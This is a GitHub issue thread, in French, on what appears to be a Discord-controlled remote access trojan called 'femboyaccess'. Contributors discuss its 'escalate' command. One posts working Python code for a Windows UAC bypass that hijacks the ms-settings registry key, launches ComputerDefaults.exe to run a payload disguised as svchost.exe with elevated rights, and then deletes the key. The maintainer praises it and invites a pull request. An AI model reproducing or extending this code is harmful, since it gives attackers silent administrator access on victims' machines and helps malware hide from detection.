### ISSUE TITLE
besoin d'aide 😅

### ISSUE THREAD

**Issue by StuKit** [ambr0sial/femboyaccess#4]
Hello ! J'espère que tu vas bien, depuis quelques heures j'essayais de faire quelque chose que je n'y arrive toujours pas, c'est de modifié la fonction escalate (elevate les permissions) pour faire en sorte de choisir manuellement la path qui sera exécuté en tant qu'administrateur, je sais pas si t'aurai une idée de comment faire mais si t'en a, éclairci moi x)

**Comment by ambr0sial** [comment]
coucouu!! désolée je vois pas vraiment de quoi tu veux parler- quel path exactement??

**Comment by StuKit** [comment]
update : j'ai fini par utiliser une autre méthode de privilege escalation qui je trouve est plus rapide et plus direct via un module déjà présent
voilà si tu veux le modifier & l'intégrer :
        if message.content.startswith("escalate"):
            usr = os.getlogin()
            dst = f"C:\\Users\\{usr}\\AppData\\Local\\.cache\\svchost.exe"
            location = winreg.HKEY_CURRENT_USER
            key = winreg.CreateKey(winreg.HKEY_CURRENT_USER, 'SOFTWARE\\Classes\\ms-settings\\shell\\open\\command')
            soft = winreg.OpenKeyEx(location, r"SOFTWARE\\Classes\\ms-settings\\shell\\open\\")
            key_1 = winreg.CreateKey(soft, "command")
            
            winreg.SetValueEx(key_1, "", 0, winreg.REG_SZ,
                           dst)
            winreg.SetValueEx(key_1, "DelegateExecute", 0, winreg.REG_SZ,
                           "")
            os.system('''powershell Start-Process "C:\Windows\System32\ComputerDefaults.exe"''')
            os.system('''powershell Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore''')
            if key_1:
                winreg.CloseKey(key_1)
            sys.exit()

**Comment by ambr0sial** [comment]
ingénieux mdrr, si tu veux tu peux faire une pull request pour l'ajouter!
